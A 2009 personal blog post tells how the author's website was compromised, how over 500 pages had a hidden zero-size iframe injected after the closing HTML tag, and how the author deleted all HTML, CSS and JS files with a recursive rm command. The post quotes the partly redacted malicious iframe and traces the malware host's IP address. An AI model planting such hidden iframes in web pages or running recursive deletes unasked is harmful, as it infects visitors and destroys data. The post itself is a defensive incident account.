mailto: blog -at- heyrick -dot- eu


Use the player above to listen to the podcast version of this b.log entry,
or click here to download it for listening to on the MP3 player of your choice.

Google cares, but only so much...

Google has no problems with adding a warning to your website, like this:

However, when coming to do something about it, Google has many potential problems:

  • I am not going to complain about having to log in to Google's webmaster tools, create an account, and upload a special HTML file to the site. Google is a machine, and it has to know you are who you say you are. Now for the remainder of the discussion, remember that you HAVE created yourself an account within Google...
  • The report that you can read only provides a small subset example:
  • When you log in as a webmaster, Google will provide an example listing of affected pages. It lists 25 pages. But there's a bug in Google - Ewen deleted those pages listed and asked for it to scan HeyRick again, and it reported malware (obviously) and provided the same list of example pages. Looking for those pages in the browser reported 404. They were truely gone.

Now given the small numbers, we thought we could get on top of this problem. Google's webmaster tools turned out to be rather useless - it should have a way to access a listing of all pages it thinks are 'damaged', along with a brief reason why - even if in code form that you have to look up.

Why do I say this? We spent a week knowing the site had been compromised looking for ways to hunt down the offending pages. I fired up Minix3 in a virtual PC and swotted up on grep...

...but it wasn't until Ewen had a brainwave that the actual nature of the problem became clear.

Ewen decided to download a copy of the entire site, and to see how many warnings his antivirus threw up. Now I have no idea of how many actual pages are on my site - it is spread across three computers. The 'active' part of my site amounts to a little over 900 pages. I would guess about another hundred or so (?) on the RiscPC.

Ewen told me over 500 pages were infected.

 

Bye-bye HeyRick

I told Ewen to log in to the server and issue "rm -rv *.html" (and likewise for *.css and *.js).

If Google had revealed the true nature of the problem, we'd have taken the heavy-handed route earlier.

For those of you who don't know Unix commands - that is an instruction to recursively delete all of the HTML files on HeyRick. Every single web page - gone! The graphics, archives, and such will remain, but all the pages will be erased. If there is anything on the site that is not a part of the offline copies, it will be lost forever. Too bad.

There's a part of me that wants to think "oh well, that's what you get for using crap software", but there's a bigger part of me that has some modicum of responsibility. So users might be clueless and using insecure software. An awful lot of people don't have a clue when it comes to security. I know some people that heard a warning about computer viruses on TV and went out and bought an anti-spyware package from two years ago as it was on a special offer. I offered to install AVG, but as they were on dial-up they declined (consider how long many megabytes would take to download at 56kbps) and now use a computer on the internet with no antivirus whatsoever. Thankfully there is little important information on that machine, but that doesn't mean it's immune, or even remotely safe. I very much doubt they are alone.

So as a responsible netizen, it is my duty to do what I can to provide a safer web experience. Some people may have issue over parts of my site (expecially if they subscribe to the 'creationalist' theory), but this is a problem of freedom of thought. Things I say may compromise your beliefs (or vice versa? email me!), but there should be nothing on a website that will compromise your computer.

You will notice that I have a pretty lax attitude to tracking visitors. Some stuff (like Frobnicate) indirected to a php script to log how many downloads it gets so I can track popularity. Some stuff might ask for your email address if it is restricted release software. But for 99.9% of this site, I don't care who visits or how often. Cookies are not used. My own privacy policy warns you against accessing the site via frames or other wrappings unless as an automatic translation you yourself have requested. I don't need to know who you are, why should anybody else track you.
So you can guess how I felt seeing the "malware" flag applied to my site...

Staying in that situation, the risk of doing bad things to the computers of my visitors was too great. So I issued Ewen with the takedown order. It's all gone.

 

Argh! 404s!

Sometimes bad luck just keeps on coming. I went to the library on Saturday to pass a 12Mb TAR to Ewen to restore parts of the site after it was wiped off, and found they the server was throwing a wobbly. Located in the (locked) mayor's building, it couldn't be reset and it was refusing connection to everything. So I SMS'd Ewen to take it all off. Putting it back we can do in our own time. Taking it off is a priority. And it'd have been done a week earlier if Google had provided a genuine clue as to the scale of the damage.

 

Recovery

As you are reading this, some parts of HeyRick have been restored. What you will have access to is the 'live' part of my site residing on Aiko's harddisc. I don't think it will be until I get the eeePC that I will attempt to reconstruct a complete copy of my site on an SD card. The reason it was split is the old laptop I used to use only had a 6Gb harddisc and I didn't feel able to justify space on the disc for a complete copy of the site for stuff that I'd not be working on any more - like Argonet Voyager utilities...

What you see is likely to be all that will be available until I get ADSL at home. Ewen has been doing some sterling work getting this mess sorted out, but I can't ask him to walk through every single page looking for broken links and missing content. That's something I will need to do myself.

If there is something missing that you would like made available - email me - I will take requests!

 

92.38.0.0

It is really useful to know that http://www.ip-db.com/ exists. It made it effortless to track down that IP address which is, I believe, the site hosting the malware itself.

The IP address is located here in the region Hlavni mesto Praha (i.e. Prague) in the Czech Republic, and it was allocated on 2008/02/01. The BGP routing information is via "AS48974" registered to Masterforex Ltd. This may be the spoof "m-analytics"?

 

What actually was the infection code?

Appended to the bottom of various pages, after the closing </html> tag, was this:
<iframe src="http://m-an<omitted>tics.net/arwe/?<hex string>" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
I could point out a number of security flaws that lead to this working - parsing beyond the closing HTML tag, actually being stupid enough to obey a zero-size and hidden IFrame... A browser that obeyed that link ought to be condemned. But that doesn't help the end user...

On the plus side, I was by no means alone - read http://www.theregister.co.uk/2009/05/30/mass_web_infection/.
Please pay careful attention to the links to related stories at the bottom of that page. Infections hittings servers, numbers in tens of thousands. It doesn't bode well for on-line security, and if you are one of the people who are browsing the web and your computer isn't locked up tighter than a nun's panties, you might be well advised to make shoring up your defences the number one priority above everything else.

 

Holy Mary mother of God...!

I heard this expression uttered by the news presenter at the end of The Goonies when that old boat comes in to view. It's a bit bogus as an expression as, wasn't Mary the mother of Jesus, and God sort-of doesn't have a mother? You could argue for ages over if God is the creator, who created God... but I digress - for as bizarre as the expression may seem, it sounds good when looking at:

You might be thinking, oooh, 35.1°, that's not so hot. Well, it is for around here! It's our current hottest. Well, no, I lie. In the time it took to process this picture, it has risen a tenth of a degree - to 35.2°C! The forecast? 29°C!

The time on the device is from radio-sync. The camera is running a little fast. I'll fix that now...

 

Your comments:

Please note that while I check this page every so often, I am not able to control what users write; therefore I disclaim all liability for unpleasant and/or infringing and/or defamatory material. Undesired content will be removed as soon as it is noticed. By leaving a comment, you agree not to post material that is illegal or in bad taste, and you should be aware that the time and your IP address are both recorded, should it be necessary to find out who you are. Oh, and don't bother trying to inline HTML. I'm not that stupid! ☺ ADDING COMMENTS DOES NOT WORK IF READING TRANSLATED VERSIONS.
 
You can now follow comment additions with the comment RSS feed. This is distinct from the b.log RSS feed, so you can subscribe to one or both as you wish.

No comments yet...

Add a comment (v0.11) [help?] . . . try the comment feed!
Your name
Your email (optional)
Validation Are you real? Please type 37339 backwards.
Your comment
French flagSpanish flagJapanese flag
Calendar
«   June 2009   »
MonTueWedThuFriSatSun
124567
8910111314
15161718192021
2223252627
2930     

(Felicity? Marte? Find out!)

Last 5 entries

List all b.log entries

Return to the site index

Geekery
 
Alphabetical:

Search

Search Rick's b.log!

PS: Don't try to be clever.
It's a simple substring match.

Etc...

Last read at 09:12 on 2024/11/23.

QR code


Valid HTML 4.01 Transitional
Valid CSS
Valid RSS 2.0

 

© 2009 Rick Murray
This web page is licenced for your personal, private, non-commercial use only. No automated processing by advertising systems is permitted.
RIPA notice: No consent is given for interception of page transmission.

 

Have you noticed the watermarks on pictures?
Next entry - 2009/07/03
Return to top of page